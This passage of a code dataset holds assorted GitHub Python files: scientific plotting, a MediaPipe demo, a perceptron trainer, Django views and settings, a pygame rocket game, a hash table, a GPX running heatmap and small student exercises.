Returns:\n Nothing. Just the plots.\n \"\"\"\n if applyscmFac:\n scmfac = (2*np.pi)**2\n print('Applying 2 Pi-squared factor.')\n else:\n scmfac = 1\n scm = np.memmap(inLoc + 'scattering_matrix_5.87_simple.mmap', dtype='float64', mode='r', shape=(42433, 42433))\n rates = (-1) * np.diag(scm) * scmfac * 1E-12\n plt.figure()\n plt.plot(df['energy'], rates, '.', MarkerSize=3)\n plt.xlabel('Energy [eV]')\n plt.ylabel(r'Scattering rate [ps$^{-1}$]')\n\n\nif __name__ == '__main__':\n out_Loc = 'E:/Dropbox (Minnich Lab)/Alex_Peishi_Noise_Calcs/BoltzmannGreenFunctionNoise/#1_Problem/1_Pipeline/Output/'\n in_Loc = 'E:/Dropbox (Minnich Lab)/Alex_Peishi_Noise_Calcs/BoltzmannGreenFunctionNoise/#1_Problem/0_Data/'\n electron_df = pd.read_pickle(in_Loc+'electron_df.pkl')\n electron_df = noise_power_v1.fermi_distribution(electron_df)\n fields = np.array([1e1,2e1,3e1,4e1,5e1,6e1,7e1,8e1,9e1,1e2,2e2,3e2,4e2,5e2,6e2,7e2,8e2,9e2,2e3,4e3,6e3,8e3,1e4,2e4,4e4,6e4,8e4,1.1e5,1.2e5,1.3e5,1.4e5,1.5e5,1.6e5,1.7e5,1.8e5,1.9e5,2e5])\n driftvel_mobility_vs_field(out_Loc,electron_df,fields)\n plot_vel_KDEs(out_Loc, 1.8e5, electron_df, plotRTA=True, plotLowField=True, plotFDM=True)\n plot_scattering_rates(in_Loc, electron_df, applyscmFac=True)\n plot_noise(out_Loc, fields, electron_df, plotRTA=True, plotFDM=True)\n plt.show()","repo_name":"alexanderychoi/linear_boltzmann","sub_path":"archive/plotting_v1.py","file_name":"plotting_v1.py","file_ext":"py","file_size_in_byte":12187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9289172873","text":"import os\nimport sys\n\nsys.path.append(os.getcwd())\n\nimport cv2\nimport mediapipe as mp\nfrom models.preprocessing.mediapipe import pose_estimation\nimport numpy as np\nfrom mediapipe.framework.formats import landmark_pb2\n\n\n\nmp_holistic = mp.solutions.holistic\n\n# For webcam input:\ncap = cv2.VideoCapture()\ncap.open(\"data/template.mp4\")\n\nwith mp_holistic.Holistic(\n static_image_mode=True,\n model_complexity=2) as holistic:\n\n while cap.isOpened():\n\n success, image = cap.read()\n if not success:\n print(\"Ignoring empty camera frame.\")\n break\n\n image = pose_estimation(image, holistic)\n image = cv2.resize(image, (256, 256))\n cv2.imshow('MediaPipe Holistic', image)\n if cv2.waitKey(5) & 0xFF == 27:\n break\n\ncap.release()\n","repo_name":"WayenVan/SignLanguageTranslation","sub_path":"tests/mp.py","file_name":"mp.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10038190003","text":"import numpy as np\nimport pandas as pd\nfrom perceptron import Perceptron\nfrom time import time\nimport pickle\n\ndef step1_get_data() : \n # iris.data 파일에서 데이터를 읽어온다.\n df= pd.read_csv('./3.IrisPerceptron/iris.data', header=None)\n #print(df)\n #꽃잎 데이터를 추출한다.\n X=df.iloc[0:100, [2, 3]].values\n #print(x)\n #꽃 종류 데이터를 추출한다.\n y= df.iloc[0:100, 4].values\n y=np.where(y=='Iris-setosa',1,-1)\n #print(y)\n return X, y\ndef step2_learning() :\n ppn=Perceptron(eta=0.1)\n data=step1_get_data()\n X=data[0]\n y=data[1]\n #학습한다.\n ppn.fit(X, y)\n print(ppn.errors_)\n print(ppn.w_)\n #학습된 객체를 저장한다.\n #학습이 완료된 객체를 파일로 저장한다.\n with open('./3.IrisPerceptron/perceptron.dat', 'wb') as fp:\n pickle.dump(ppn, fp)\n print(\"학습 완료\")\ndef step3_using() :\n #파일로 부터 객체를 복원한다.\n with open('./3.IrisPerceptron/perceptron.dat', 'rb') as fp:\n ppn = pickle.load(fp)\n\n\n while True :\n a1 = input(\"너비를 입력해 주세요:\")\n a2 = input(\"길이를 입력해 주세요:\")\n\n X = np.array([float(a1),float(a2)])\n result = ppn.predict(X)\n if result ==1 :\n print('결과 : Iris-setosa')\n else:\n print('결과 : Iris-versicolor')\n\n\n\n\n\n# if __name__ == \"__main__\":\n # step1_get_data()\nstep2_learning()\nstep3_using()\n","repo_name":"y0ngma/python_basic","sub_path":"4MachineLearning/3.IrisPerceptron/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23998916094","text":"from django.shortcuts import render\n\nfrom .forms import ProfileForm\n\nIMAGE_FILE_TYPES = ['png', 'jpg', 'jpeg']\n\ndef create_profile(request):\n\n if request.method == 'POST':\n\n print('POST Request Received 1')\n\n form = ProfileForm(request.POST, request.FILES)\n\n if form.is_valid():\n\n print('POST Request Received 2')\n\n user_pr = form.save(commit=False)\n user_pr.display_picture = request.FILES['display_picture']\n\n file_type = user_pr.display_picture.url.split('.')[-1]\n file_type = file_type.lower()\n\n if file_type not in IMAGE_FILE_TYPES:\n return render(request, 'error.html')\n\n user_pr.save()\n print('going to details')\n return render(request, 'details.html', {'user_pr': user_pr})\n\n else:\n form = ProfileForm()\n return render(request, 'create.html', {\"form\": form})\n\n elif request.method == 'GET':\n\n print('GET Request Received')\n\n form = ProfileForm()\n return render(request, 'create.html', {\"form\": form})\n","repo_name":"girishf15/DjangoFileUpload","sub_path":"userprofile/userprofile_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32069970572","text":"import os\n\ndbPath = os.path.join(os.path.dirname(__file__), 'db.sqlite3')\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': os.getenv('POSTGRES_DB'),\n 'USER': os.getenv('POSTGRES_USER'),\n 'PASSWORD': os.getenv('POSTGRES_PASSWORD'),\n 'HOST': os.getenv('SYMPORTAL_DATABASE_CONTAINER'),\n 'PORT': '5432',\n#\t 'OPTIONS': {'timeout':200}\n }\n}\n\n\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.dummy.DummyCache',\n }\n}\n\n\nINSTALLED_APPS = (\n 'dbApp',\n )\n\nSECRET_KEY = ''\n","repo_name":"reefgenomics/symportal-2.0","sub_path":"symportal_framework/settings_blank.py","file_name":"settings_blank.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43723553521","text":"import math\nimport pygame\nimport random\nimport time\n\n\ndef remove_object_off_screen(obj_x, obj_y, obj_speed):\n for i in range(len(obj_x)):\n if obj_y[i] > HEIGHT:\n obj_y.pop(i)\n obj_x.pop(i)\n obj_speed.pop(i)\n return\n\ndef remove_object(obj_x, obj_y, obj_speed, index):\n obj_y.pop(i)\n obj_x.pop(i)\n obj_speed.pop(i)\n \ndef update_position(obj, obj_speed):\n for i in range(len(obj)):\n obj[i] += obj_speed[i]\n \ndef create_object(obj_x, obj_y, obj_speed):\n obj_x.append(random.randint(0, WIDTH - OBJECT_SIZE))\n obj_y.append(0 - OBJECT_SIZE)\n obj_speed.append(random.randint(2,7))\n \n\n \n\n# Initialize Pygame\npygame.init()\n\n# Constants\nWIDTH, HEIGHT = 1920, 1080\nPLAYER_SIZE = 246\nOBJECT_SIZE = 160\nPLAYER_SPEED = 5\nWHITE = (255, 255, 255)\nBLUE = (0, 0, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nDELAY = time.time_ns\n\n# Create the screen\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Rocket Game\")\n\n# Load images\nplayer_img = pygame.image.load(\"resources/cohete_on_wf.png\")\nenemy_img = pygame.image.load(\"resources/Rock Pile.png\")\nfuel_img = pygame.image.load(\"resources/fuel.png\")\nmoon_img = pygame.image.load(\"resources/moon.png\")\nbackground_img = pygame.image.load(\"resources/back.png\")\n\n# Initialize Pygame fonts\npygame.font.init()\nfont = pygame.font.Font(None, 36)\n\n# Initialize moon position\nmoon_x = WIDTH // 2 - 256\nmoon_y = -256\n\n# Initialize player position\nplayer_x = WIDTH // 2 - PLAYER_SIZE // 2\nplayer_y = HEIGHT - PLAYER_SIZE\nplayer_x_change = 0\n\n# Initialize enemy position\nenemy_x = []\nenemy_y = []\nenemy_y_speed = []\n\n# Initialize fuel position\nfuel_x = []\nfuel_y = []\nfuel_y_speed = []\n\n# Initialize fuel level\nfuel_level = 100\n\n# Initialize variables for score\nscore = 1\n\n# Game loop\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n running = False\n if fuel_level > 0:\n if event.key == pygame.K_LEFT:\n player_x_change = -PLAYER_SPEED\n if event.key == pygame.K_RIGHT:\n player_x_change = PLAYER_SPEED\n if event.key == pygame.K_LSHIFT or event.key == pygame.K_RSHIFT:\n PLAYER_SPEED *= 3 # Double the player speed\n elif event.key == pygame.K_r:\n # Reset the game\n fuel_level = 100\n player_x = WIDTH // 2 - PLAYER_SIZE // 2\n player_y = HEIGHT - PLAYER_SIZE\n score = 1\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LSHIFT or event.key == pygame.K_RSHIFT:\n PLAYER_SPEED /= 3 # Reset player speed to normal when Shift key is released\n if player_x_change > 0:\n if event.key == pygame.K_RIGHT:\n player_x_change = 0\n else:\n if event.key == pygame.K_LEFT:\n player_x_change = 0\n\n\n player_x += player_x_change\n\n # Boundaries for the player\n if player_x < 0 - PLAYER_SIZE/4:\n player_x = 0 - PLAYER_SIZE/4\n elif player_x > WIDTH - PLAYER_SIZE * 0.75:\n player_x = WIDTH - PLAYER_SIZE * 0.75\n\n # Delete enemy and fuel\n remove_object_off_screen(enemy_x, enemy_y, enemy_y_speed)\n remove_object_off_screen(fuel_x, fuel_y, fuel_y_speed)\n \n # Move enemy and fuel\n update_position(enemy_y, enemy_y_speed)\n update_position(fuel_y, fuel_y_speed)\n\n # Respawn enemy and fuel\n if fuel_level > 0:\n if random.randint(1,40) == 1:\n create_object(enemy_x, enemy_y, enemy_y_speed)\n if random.randint(1,150) == 1:\n create_object(fuel_x, fuel_y, fuel_y_speed)\n\n # Check for collision with enemy\n for i in range(len(enemy_x)):\n if (\n player_x + 60 < enemy_x[i] + OBJECT_SIZE\n and player_x + PLAYER_SIZE - 60 > enemy_x[i]\n and player_y < enemy_y[i] + OBJECT_SIZE\n and player_y + PLAYER_SIZE > enemy_y[i]\n ):\n fuel_level -= 20\n remove_object(enemy_x, enemy_y, enemy_y_speed, i)\n break\n \n\n # Check for collision with fuel\n for i in range(len(fuel_x)):\n if (\n player_x + 60 < fuel_x[i] + OBJECT_SIZE\n and player_x + PLAYER_SIZE - 60 > fuel_x[i]\n and player_y < fuel_y[i] + OBJECT_SIZE\n and player_y + PLAYER_SIZE > fuel_y[i]\n ):\n fuel_level += 15\n remove_object(fuel_x, fuel_y, fuel_y_speed, i)\n break\n \n # Reduce fuel based on time\n if score % 100 == 0:\n fuel_level -= 1\n\n # Keep fuel level within bounds\n if fuel_level < 0:\n fuel_level = 0\n elif fuel_level > 100:\n fuel_level = 100\n\n # Clear the screen\n screen.blit(background_img, (0,0))\n\n # Draw player, enemy, and fuel\n screen.blit(player_img, (player_x, player_y))\n screen.blit(moon_img, (moon_x, moon_y))\n for i in range(len(enemy_x)):\n screen.blit(enemy_img, (enemy_x[i], enemy_y[i]))\n for i in range(len(fuel_x)):\n screen.blit(fuel_img, (fuel_x[i], fuel_y[i]))\n\n # Draw fuel level\n pygame.draw.rect(screen, GREEN, (10, 10, fuel_level * 2, 20))\n pygame.draw.rect(screen, RED, (10, 10, 200, 20), 2)\n \n # Drawing score\n if fuel_level > 0:\n score += 1\n score_text = font.render(f\"Score: {math.floor(score / 150)}\", True, BLUE)\n score_rect = score_text.get_rect()\n score_rect.topleft = (10, 50)\n screen.blit(score_text, score_rect)\n \n pygame.display.update()\n if fuel_level <= 0:\n for i in range(len(enemy_x)):\n remove_object(enemy_x,enemy_y, enemy_y_speed, i)\n break\n for i in range(len(fuel_x)):\n remove_object(fuel_x,fuel_y, fuel_y_speed, i)\n break\n game_over_text = font.render(\"Game Over\", True, RED)\n game_over_rect = game_over_text.get_rect()\n game_over_rect.center = (WIDTH // 2, HEIGHT // 2)\n screen.blit(game_over_text, game_over_rect)\n\n retry_text = font.render(\"Press R to retry or Q to quit\", True, BLUE)\n retry_rect = retry_text.get_rect()\n retry_rect.center = (WIDTH // 2, HEIGHT // 2 + 40)\n screen.blit(retry_text, retry_rect)\n\n pygame.display.update()\n\n# Quit the game\npygame.quit()\n\n\n","repo_name":"Fefd-Dev/GAME-JAM","sub_path":"moon-theme/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40357844438","text":"from rembg import remove\nfrom PIL import Image\nimport os\n\ndef rem_bg () :\n\n for i in range(3):\n # Baca file 'hasil/insta_i.jpg'\n filename = f'insta_{i}.jpg'\n filepath = os.path.join('static/original', filename)\n im = Image.open(filepath)\n\n # Proses gambar dengan fungsi remove\n output = remove(im)\n\n # Simpan gambar ke direktori 'result' dengan nama 'nobg_i.png'\n outfilename = f'nobg_{i}.png'\n outfilepath = os.path.join('static/nobackground', outfilename)\n output.save(outfilepath)","repo_name":"yoannikaros/people_characteristics","sub_path":"functions/removebg.py","file_name":"removebg.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16932331826","text":"\r\nN = int(input(\"Введите к-во студентов: \"))\r\nK = 10 ** 3\r\na = []*K\r\nb = []*K\r\nd = \"#\"\r\nc = b = str(\"\")\r\nfor i in range(K):\r\n a.append(input(\"Введите число: \"))\r\n if a[i] == d:\r\n break\r\nx = a.pop()\r\nfor i in range(K):\r\n a[i] = int(a[i])\r\n print(a)\r\n#def sorter(item):\r\n# student_id = 10 - item[1]\r\n# value = 10 - item[2]\r\n# print(student_id)\r\n# return (student_id, value)\r\n #a = []a.sort(key=lambda x: len(x))a[]a.sort(key=lambda x: len(x), reverse=True)[]\r\n# return a\r\n#sorted_list = sorted(a, key=sorter)\r\n\r\nprint(a)\r\n#print(b)\r\n#print(sorted_list)","repo_name":"sasha39612/Algoritm_on_Pyhont_MFTI","sub_path":"Exercise_6_E_MFTI_not_done.py","file_name":"Exercise_6_E_MFTI_not_done.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35898432462","text":"import random\n\n\n\nclass LinearProbingHashST:\n\t_INIT_CAPACITY = 10\n\t# initializes an empty hash table\n\tdef __init__(self, m = None):\n\t\tif m is None:\n\t\t\tm = self._INIT_CAPACITY\n\t\t# number of elements in the table\n\t\tself._n = 0 \n\t\t# number of chains in the hash table\n\t\tself._m = m\n\t\t# list containing sepearate chains\n\t\tself._keys = [None] * self._m\n\t\tself._vals = [None] * self._m\n\n\t# resize the hash table to have the given the new capacity\n\t# then rehash all the previous keys.\n\tdef _resize(self, capacity):\n\t\ttemp = LinearProbingHashST(capacity)\n\t\tfor i in range(0, self._m):\n\t\t\tif self._keys[i] is not None:\n\t\t\t\ttemp.put(self._keys[i], self._vals[i])\n\n\t\tself._keys = temp._keys\n\t\tself._vals = temp._vals\n\t\tself._m = temp._m\n\t\tself._n = temp._n\n\n\t# hash the value between 0 and m-1\n\tdef _hash(self, key):\n\t\treturn (hash(key) & 0x7fffffff) % self._m\n\n\t# returns the number of key-value paris in this hash table\n\tdef size(self):\n\t\treturn self._n\n\n\t# returns True if the hash table is empty\n\tdef isEmpty(self):\n\t\treturn self.size() == 0\n\n\t# returns True if this hash table contains the specified key.\n\tdef contains(self, key):\n\t\treturn (self.get(key) is not None)\n\n\t# Returns the value associated with the specified key in this symbol table.\n\tdef get(self, key):\n\t\ti = self._hash(key)\n\t\twhile self._keys[i] is not None:\n\t\t\tif self._keys[i] == key:\n\t\t\t\treturn self._vals[i]\n\t\t\ti = (i + 1) % m\n\t\treturn None\n\n\t# Inserts the specified key-value pair into the symbol table, overwriting the old \n\t# value with the new value if the symbol table already contains the specified key.\n\t# Deletes the specified key (and its associated value) from this symbol table\n\t# if the specified value is None\n\tdef put(self, key, value):\n\t\tif value is None:\n\t\t\tself.delete(key)\n\t\t\treturn\n\n\t\t# double the table size if it's 50% full\n\t\tif self._n >= self._m // 2:\n\t\t\tself._resize(2 * self._m)\n\n\t\ti = self._hash(key)\n\t\twhile self._keys[i] is not None:\n\t\t\tif self._keys[i] == key:\n\t\t\t\tself._vals[i] = value\n\t\t\t\treturn\n\t\t\ti = (i + 1) % self._m\n\n\t\tself._keys[i] = key\n\t\tself._vals[i] = value\n\t\tself._n += 1\n\n\t# Removes the specified key and its associated value from this symbol table \n\t# (if the key is in this symbol table). \n\tdef delete(self, key):\n\t\tif self.contains(key) == False:\n\t\t\treturn \n\t\ti = self._hash(key)\n\t\twhile self._keys[i] != key:\n\t\t\ti = (i + 1) % self._m\n\n\t\tself._keys[i] = None\n\t\tself._vals[i] = None\n\n\t\ti = (i + 1) % self._m\n\t\t# rehash all keys in same cluster\n\t\twhile self._keys[i] is not None:\n\t\t\t# delete keys[i] and vals[i] and reinsert\n\t\t\tkey_to_rehash = self._keys[i]\n\t\t\tval_to_rehash = self._keys[i]\n\t\t\tself._keys[i] = None\n\t\t\tself._vals[i] = None\n\t\t\tself._n -= 1\n\t\t\tself.put(key_to_rehash, val_to_rehash)\n\t\t\ti = (i + 1) % self._m\n\n\t\tself._n -= 1\n\n\t\t# halve table size if it's 12.5% full or less\n\t\tif self._n > 0 and self._n <= self._m // 8:\n\t\t\tself._resize(self._m // 2)\n\n\n\t# returns list of keys in the hash table\n\tdef keys(self):\n\t\toutput_keys = []\n\t\tfor i in range(0, self._m):\n\t\t\tif self._keys[i] is not None:\n\t\t\t\toutput_keys.append(self._keys[i])\n\t\treturn output_keys\n\n\nif __name__ == \"__main__\":\n\tst = LinearProbingHashST()\n\tinput_list = range(0, 256)\n\trandom.shuffle(input_list)\n\tfor num in input_list:\n\t\tst.put(str(num), num)\n\n\tfor s in st.keys():\n\t\tprint(s, st.get(s))\n\t\tst.delete(s)\n\n\n\n","repo_name":"monkeybarzz/free-algos","sub_path":"3_searching/linear_probing_hash_st.py","file_name":"linear_probing_hash_st.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26406509138","text":"from datetime import date\natual = date.today().year\nnovo = 0\nvelho = 0\nfor c in range(1, 8):\n x = int(input(f'Em que ano a {c}ª pessoa nasceu? '))\n if atual - x < 18:\n novo += 1\n else:\n velho += 1\nprint(f'Ao todo tivemos {velho} pessoas maiores de idade')\nprint(f'E também tivemos {novo} pessoas menores de idade.')\n","repo_name":"KKBittencourtZ/LevelUp","sub_path":"Python/chalendsPython/ex054.py","file_name":"ex054.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73632868533","text":"\nfrom sys import stdin\n\nclass Solution:\n\n def __init__(self):\n self.results = []\n pass\n\n def commonChars(self , chars):\n if (len(chars) < 1):\n print(\"\")\n return\n # write code here\n charCountMaps = []\n firstString = chars[0]\n for s in chars:\n length = len(s)\n charCountMap = {}\n for i in range(length):\n c = s[i]\n if (c not in charCountMap.keys()):\n charCountMap[c] = 1\n else:\n charCountMap[c] = charCountMap[c] + 1;\n charCountMaps.append(charCountMap)\n result = []\n for c in firstString:\n ok = True\n for charCountMap in charCountMaps:\n if (c in charCountMap.keys() and charCountMap[c] >= 1):\n charCountMap[c] = charCountMap[c] - 1\n else:\n ok = False\n break\n if (ok):\n result.append(c)\n result.sort()\n print(\"\".join(result))\n\n def min_send(self, nums, m):\n\n self.devide(nums, m, 0)\n return min(self.results)\n\n def devide(self, left_nums, left_devide, temp_Max):\n if (left_devide == 1):\n temp_sum = sum(left_nums);\n if (temp_sum > temp_Max):\n self.results.append(temp_sum)\n else:\n self.results.append(temp_Max);\n else:\n length = len(left_nums)\n if (length < left_devide):\n return\n if (length == left_devide):\n _temp_Max = min(left_nums)\n if (_temp_Max > temp_Max):\n self.results.append(_temp_Max)\n else:\n self.results.append(temp_Max);\n return\n for i in range(0, length):\n temp_nums = left_nums[0 : i + 1]\n temp_sum = sum(temp_nums)\n if (temp_sum > temp_Max):\n temp_Max = temp_sum;\n temp_left_nums = left_nums[i + 1 : length]\n self.devide(left_nums = temp_left_nums, left_devide = left_devide - 1, temp_Max = temp_Max)\n\n def find_diff_char(self, str1, str2):\n length1 = len(str1)\n length2 = len(str2)\n result1 = 0\n result2 = 0\n for i in range(length1):\n result1 = result1 + int(str1[i])\n for i in range(length2):\n result2 = result2 + int(str2[i])\n print(result2 - result1)\n\nif __name__ == '__main__':\n # chars = [\"bella\",\"labela\",\"rollera\", \"ela\", \"\"]\n # chars = [\"bella\"]\n s = Solution();\n # s.commonChars(chars)\n nums = [4,3,5,10,12]\n m = 2\n result = s.min_send(nums, m)\n print(\"min max : {0}\".format(result))\n # str1, str2 = \"abcd\",\"abcde\"\n # s.find_diff_char(str1, str2)\n","repo_name":"mouseM/learningMouse","sub_path":"LeCode/SXF.py","file_name":"SXF.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20469921145","text":"import os\nimport glob\n\nimport folium\nimport gpxpy\n\nimport numpy as np\nimport pandas as pd\nfrom geopy.geocoders import Nominatim\n\ngeolocator = Nominatim()\nlocation = geolocator.geocode(\n \"Montreal Quebec\"\n) # Change this to change location centering\nlat_check = float(location.raw[\"lat\"])\nlon_check = float(location.raw[\"lon\"])\n\ndata = glob.glob(\"*.gpx\")\nfitdata = glob.glob(\"*.fit\")\n\nif not len(fitdata) == 0:\n print(\"Converting Garmin FIT files\")\n os.system(\"python fit_to_csv.py\")\n os.system(\"mkdir fit_files\")\n os.system(\"mv *.fit ./fit_files\")\n\ncsvdata = glob.glob(\"*.csv\")\n\nlat = []\nlon = []\n\nall_lat = []\nall_long = []\n\nprint(\"Loading data\")\n\nfor activity in data:\n gpx_filename = activity\n gpx_file = open(gpx_filename, \"r\")\n gpx = gpxpy.parse(gpx_file)\n\n for track in gpx.tracks:\n for segment in track.segments:\n for point in segment.points:\n lat.append(point.latitude)\n lon.append(point.longitude)\n\n check1 = np.any(\n np.isclose(lat, lat_check, atol=0.5)\n ) # Change the tolerance 'atol' to include a larger or smaller area around the centering point\n check2 = np.any(\n np.isclose(lon, lon_check, atol=0.5)\n ) # Change the tolerance 'atol' to include a larger or smaller area around the centering point\n\n if check1 and check2:\n all_lat.append(lat)\n all_long.append(lon)\n\n lon = []\n lat = []\n\nfor activity in csvdata:\n csv_filename = activity\n csv_file = pd.read_csv(csv_filename)\n\n for i in range(len(csv_file)):\n lat.append(csv_file[\"position_lat\"][i])\n lon.append(csv_file[\"position_long\"][i])\n\n check1 = np.any(\n np.isclose(lat, lat_check, atol=0.5)\n ) # Change the tolerance 'atol' to include a larger or smaller area around the centering point\n check2 = np.any(\n np.isclose(lon, lon_check, atol=0.5)\n ) # Change the tolerance 'atol' to include a larger or smaller area around the centering point\n\n if check1 and check2:\n all_lat.append(lat)\n all_long.append(lon)\n\n lon = []\n lat = []\n\nall_lat = all_lat[0]\nall_long = all_long[0]\n\ncentral_long = sum(all_long) / float(len(all_long))\ncentral_lat = sum(all_lat) / float(len(all_lat))\n\nprint(\"Initializing map\")\nm = folium.Map(\n location=[central_lat, central_long], tiles=\"Stamen Toner\", zoom_start=14.2\n) # Recommended map styles are \"Stamen Terrain\", \"Stamen Toner\"\n\nprint(\"Plotting gpx data\")\n\nfor activity in data:\n gpx_filename = activity\n gpx_file = open(gpx_filename, \"r\")\n gpx = gpxpy.parse(gpx_file)\n\n for track in gpx.tracks:\n for segment in track.segments:\n for point in segment.points:\n lat.append(point.latitude)\n lon.append(point.longitude)\n\n points = zip(lat, lon)\n points = [item for item in zip(lat, lon)]\n\n folium.PolyLine(points, color=\"red\", weight=2.5, opacity=0.5).add_to(m)\n lat = []\n lon = []\n\nprint(\"Plotting csv data\")\ncolor = \"red\"\nhr = []\nfor activity in csvdata:\n csv_filename = activity\n csv_file = pd.read_csv(csv_filename)\n for i in range(len(csv_file)):\n lat.append(csv_file[\"position_lat\"][i])\n lon.append(csv_file[\"position_long\"][i])\n hr.append(csv_file[\"heart_rate\"][i])\n points = zip(lat, lon)\n points = [item for item in zip(lat, lon)]\n\n # color = []\n # print('heart_rate',csv_file['heart_rate'])\n # hr = hr / max(hr)\n # for value in hr:\n # if value < 0.2:\n # color.append(\"darkred\")\n # elif value >= 0.2 and value < 0.4:\n # color.append(\"red\")\n # elif value >= 0.4 and value < 0.6:\n # color.append(\"lightred\")\n # elif value >= 0.6 and value < 0.8:\n # color.append(\"lightyellow\")\n # elif value >= 0.6:\n # color.append(\"yellow\")\n\n folium.PolyLine(points, color=color, weight=2.5, opacity=0.5).add_to(m)\n lat = []\n lon = []\n hr = []\n\nm.save(\"heatmap.html\")\n","repo_name":"mrhheffernan/PythonHeatmap","sub_path":"personal_heatmap.py","file_name":"personal_heatmap.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"34319386237","text":"import hashlib\n\n\nclass Block:\n def __init__(self, content, difficulty=1):\n self._content = content\n self._nonce = 0\n self._hash = None\n self.difficulty = difficulty\n self.algo_nonce()\n\n @property\n def nonce(self):\n return self._nonce\n\n @nonce.setter\n def nonce(self, nonce):\n self._nonce = nonce\n self._update_hash()\n\n def _update_hash(self):\n msg = hashlib.sha512()\n msg.update('{}{}'.format(self._content, self._nonce).encode())\n self._hash = msg.hexdigest()\n return self._hash\n\n def __str__(self):\n return '=== Block ===\\nContent: {}\\nNonce : {}\\nHash : {}'.format(self._content, self._nonce, self._hash)\n\n def sum_numbers_hash(self):\n result = 0\n for item in self._update_hash():\n try: \n result += int(item)\n except: \n pass\n return result\n\n def count_occurrences(self):\n dico = {}\n for elem in self._update_hash():\n try:\n dico[elem] += 1\n except:\n dico[elem] = 1\n value_max = 0\n for key in dico:\n if dico[key] > value_max:\n value_max = int(dico[key])\n\n return value_max\n\n def algo_nonce(self):\n nonce = 0 \n while (\n not self._update_hash().startswith('0' * self.difficulty)\n ) or (\n self.sum_numbers_hash() % self.difficulty\n ) or (\n self.count_occurrences() < self.difficulty + 14):\n # (x % y) is the same as (x % y != 0)\n nonce += 1\n self._nonce = nonce\n\nif __name__ == '__main__':\n a = Block('Foo')\n print(a)\n\n a = Block('Foo', 2)\n print(a)\n\n a = Block('Foo', 3)\n print(a)\n\n a = Block('Foo', 4)\n print(a)\n","repo_name":"haroldsnyers/microCourses","sub_path":"BlockChain/Coding2/Mining.py","file_name":"Mining.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20359596267","text":"from .ops import CheckBoundsOp\nfrom .defaults import defaults\nfrom .math import cast\nfrom .compat import tt\nimport numpy as np\n\n\nclass ContrastIntegral:\n def __init__(self, c, n, child=None, ydeg=defaults[\"ydeg\"], **kwargs):\n assert child is not None\n self._child = child\n self._ydeg = ydeg\n self._nylm = (self._ydeg + 1) ** 2\n self._c = cast(c)\n self._n = CheckBoundsOp(name=\"n\", lower=0, upper=np.inf)(n)\n\n # Compute the full Ylm mean and covariance weighted by\n # the spot contrast & number of spots\n mom1 = self._child.first_moment()\n eig_mom2 = self._child.second_moment()\n mom2 = tt.dot(eig_mom2, tt.transpose(eig_mom2))\n self._mean = np.pi * self._c * self._n * mom1\n self._cov = (\n (np.pi * self._c) ** 2 * self._n * (mom2 - tt.outer(mom1, mom1))\n )\n\n # Stability hacks\n epsy = kwargs.pop(\"epsy\", defaults[\"epsy\"])\n epsy15 = kwargs.pop(\"epsy15\", defaults[\"epsy15\"])\n lam = np.ones(self._nylm) * epsy\n lam[15 ** 2 :] = epsy15\n lam = tt.diag(lam)\n self._cov += lam\n\n def mean(self):\n return self._mean\n\n def cov(self):\n return self._cov\n","repo_name":"rodluger/starry_process","sub_path":"starry_process/contrast.py","file_name":"contrast.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"1963019738","text":"# function to get an integer as input, using recursive function\ndef get_int(string):\n x = input(string)\n try:\n return int(x)\n except ValueError:\n get_int(string)\n\n# function to get a valid departing train time\ndef get_valid_up_time(timings):\n time = get_int(\"Train time: \")\n # makes sure that a train is present on the input time by referencing the timings\n while time not in timings:\n print(\"There is no train at this time. Choose another train\")\n time = get_int(\"Train time: \")\n return time\n\n# recursive function to get a valid down time\ndef get_valid_down_time(t1, timings):\n time = get_int(\"Train time: \")\n # makes sure that train is present on input time\n while time not in timings:\n print(\"There is no train at this time. Choose another train\")\n time = get_int(\"Train time: \")\n # makes sure arrival is not before departure(only checks this when wrong time is given once)\n while time < t1:\n time = 